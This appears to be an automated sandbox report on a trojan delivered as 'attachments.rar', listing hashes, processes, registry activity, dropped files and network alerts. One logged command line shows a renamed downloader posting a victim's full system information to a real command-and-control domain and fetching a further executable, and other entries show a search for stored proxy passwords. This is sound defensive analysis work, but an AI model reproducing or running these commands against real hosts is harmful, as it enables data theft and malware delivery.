| File name: | attachments.rar |
| Full analysis: | https://app.any.run/tasks/5816047b-2b5b-41a6-a43a-82630b764954 |
| Verdict: | Malicious activity |
| Threats: | Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. |
| Analysis date: | April 15, 2019, 13:22:12 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/octet-stream |
| File info: | ACE archive data version 20, from Win/32, version 20 to extract, contains AV-String (unregistered), solid |
| MD5: | 0FE5E07626042E39245206C27643A24E |
| SHA1: | F297BE7B444CF0F1630FDE039F68114F3E28BB56 |
| SHA256: | 5B2C7B05368D825A4F3B10D74074D0803234F918166436D3E48EF7F9FAF66461 |
| SSDEEP: | 24576:ad89hgiTbkwgYUITd89hgiTbkwgYLGKUQ8rXpua4nP6JDxewk/DiZnFvGcyk:NXg2kwIXg2kwD4pfqiJquFucB |
MALICIOUS
Application was dropped or rewritten from another process
- win.exe (PID: 2872)
- winlog.exe (PID: 1524)
- win.exe (PID: 3796)
- winlog.exe (PID: 1532)
- config.exe (PID: 3144)
- config.exe (PID: 2032)
- config.exe (PID: 756)
- config.exe (PID: 2396)
Writes to a start menu file
- WinRAR.exe (PID: 2832)
Connects to CnC server
- config.exe (PID: 3144)
- config.exe (PID: 2032)
- config.exe (PID: 756)
- config.exe (PID: 2396)
SUSPICIOUS
Creates files in the user directory
- WinRAR.exe (PID: 2832)
Executable content was dropped or overwritten
- WinRAR.exe (PID: 2832)
- win.exe (PID: 2872)
- winlog.exe (PID: 1524)
- winlog.exe (PID: 1532)
Starts CMD.EXE for commands execution
- cmd.exe (PID: 3068)
- winlog.exe (PID: 1524)
- winlog.exe (PID: 1532)
- cmd.exe (PID: 3940)
Uses REG.EXE to modify Windows registry
- cmd.exe (PID: 2488)
- cmd.exe (PID: 3264)
- cmd.exe (PID: 1672)
- cmd.exe (PID: 3944)
- cmd.exe (PID: 2900)
- cmd.exe (PID: 3568)
Application launched itself
- cmd.exe (PID: 3940)
- cmd.exe (PID: 3068)
Uses SYSTEMINFO.EXE to read environment
- cmd.exe (PID: 3068)
- cmd.exe (PID: 3940)
Uses TASKKILL.EXE to kill process
- cmd.exe (PID: 3940)
- cmd.exe (PID: 3068)
INFO
Dropped object may contain Bitcoin addresses
- win.exe (PID: 2872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .ace | | | ACE compressed archive (100) |
|---|
EXIF
JFIF
| JFIFVersion: | 1.01 |
|---|---|
| ResolutionUnit: | None |
| XResolution: | 1 |
| YResolution: | 1 |
Composite
| ImageSize: | 1200x842 |
|---|---|
| Megapixels: | 1 |
Total processes
102
Monitored processes
60
Malicious processes
8
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 252 | Reg.exe Query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | C:\Windows\system32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 352 | Find /I "ProxyPass" | C:\Windows\system32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 572 | Reg.exe Query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | C:\Windows\system32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 756 | config.exe --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0" --post-data="versiya=wrar&comp=USER-PC&id=USER-PC_C4BA3647&sysinfo=Host Name: USER-PC+###OS Name: Microsoft Windows 7 Professional +###OS Version: 6.1.7601 Service Pack 1 Build 7601+###OS Manufacturer: Microsoft Corporation+###OS Configuration: Standalone Workstation+###OS Build Type: Multiprocessor Free+###Registered Owner: admin+###Registered Organization: +###Product ID: 00371-461-2203502-85564+###Original Install Date: 10/5/2017, 10:19:56 AM+###System Boot Time: 4/15/2019, 2:04:35 PM+###System Manufacturer: DELL+###System Model: DELL+###System Type: X86-based PC+###Processor(s): 1 Processor(s) Installed.+###[01]: x64 Family 6 Model 94 Stepping 3 GenuineIntel ~3192 Mhz+###BIOS Version: DELL DELL, 1/1/2011+###Windows Directory: C:\Windows+###System Directory: C:\Windows\system32+###Boot Device: \Device\HarddiskVolume1+###System Locale: en-us;English (United States)+###Input Locale: en-us;English (United States)+###Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London+###Total Physical Memory: 3,584 MB+###Available Physical Memory: 2,957 MB+###Virtual Memory: Max Size: 7,166 MB+###Virtual Memory: Available: 6,569 MB+###Virtual Memory: In Use: 597 MB+###Page File Location(s): C:\pagefile.sys+###Domain: WORKGROUP+###Logon Server: \\USER-PC+###Hotfix(s): 3 Hotfix(s) Installed.+###[01]: KB2534111+###[02]: KB2999226+###[03]: KB976902+###Network Card(s): 1 NIC(s) Installed.+###[01]: Intel(R) PRO/1000 MT Network Connection+###Connection Name: Connection+###DHCP Enabled: No+###IP address(es)+###[01]: 192.168.100.179+###[02]: fe80::a179:b3ff:199:2314+###" "http://lisingrout.ddns.net" -q -N http://lisingrout.ddns.net -O librelogout.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.001\config.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 1 Modules
| |||||||||||||||
| 832 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1212 | Reg.exe Query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | C:\Windows\system32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1440 | Reg.exe Query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | C:\Windows\system32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1464 | Reg.exe Query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" | C:\Windows\system32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1484 | Find /I "ProxyPass" | C:\Windows\system32\find.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1524 | "C:\Users\admin\winlog.exe" | C:\Users\admin\winlog.exe | win.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Email Microsoft Office Word Exit code: 0 Version: 9.00.7600.16385 Modules
| |||||||||||||||
Total events
2 236
Read events
2 178
Write events
58
Delete events
0
Modification events
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\attachments.rar | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\ACE Compression Software\ActiveAce\2.0 |
| Operation: | write | Name: | Count |
Value: 0 | |||
| (PID) Process: | (2504) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\ACE Compression Software\ActiveAce\2.0 |
| Operation: | write | Name: | Name |
Value: 542D4B42647265644B76737A7E794B566767537663764B5B7874767B4B43727A674B76636376747F7A72796364396576651717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171717171700 | |||
Executable files
4
Suspicious files
3
Text files
17
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\BAZA SPISOK\35573706209564.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\380506475587\380506475587_í.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\BAZA SPISOK\35726505428624.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\BAZA SPISOK\35824901472605.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\3_òáótÑ¡¬«\òáótÑ¡¬« 伿Ga« éáß¿½i¬«ó¿t 06.01.1966.docx | document | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\BAZA SPISOK\35257401912340.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\BAZA SPISOK\35975603230990.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\380506475587\380506475587.txt | text | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\1_î¿a«Gó«aѵ8\ºánóá.jpg | image | |
MD5:— | SHA256:— | |||
| 2832 | WinRAR.exe | C:\Users\admin\Desktop\attachments\380997533085\380997533085_í.txt | text | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
8
DNS requests
3
Threats
32
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2032 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
2396 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
3144 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
3144 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
2396 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
2032 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
756 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
756 | config.exe | POST | 403 | 195.62.52.164:80 | http://lisingrout.ddns.net/ | RU | — | — | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3144 | config.exe | 195.62.52.164:80 | lisingrout.ddns.net | IT Expert LLC | RU | malicious |
2396 | config.exe | 195.62.52.164:80 | lisingrout.ddns.net | IT Expert LLC | RU | malicious |
2032 | config.exe | 195.62.52.164:80 | lisingrout.ddns.net | IT Expert LLC | RU | malicious |
756 | config.exe | 195.62.52.164:80 | lisingrout.ddns.net | IT Expert LLC | RU | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| malicious |
lisingrout.ddns.net |
| malicious |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2396 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
2396 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan/Win32.Skeeyah Data Exfil |
2396 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
2396 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
2396 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan/Win32.Skeeyah Data Exfil |
2396 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
3144 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
3144 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan/Win32.Skeeyah Data Exfil |
3144 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
3144 | config.exe | A Network Trojan was detected | MALWARE [PTsecurity] SystemInfo Exfiltration |
8 ETPRO signatures available at the full report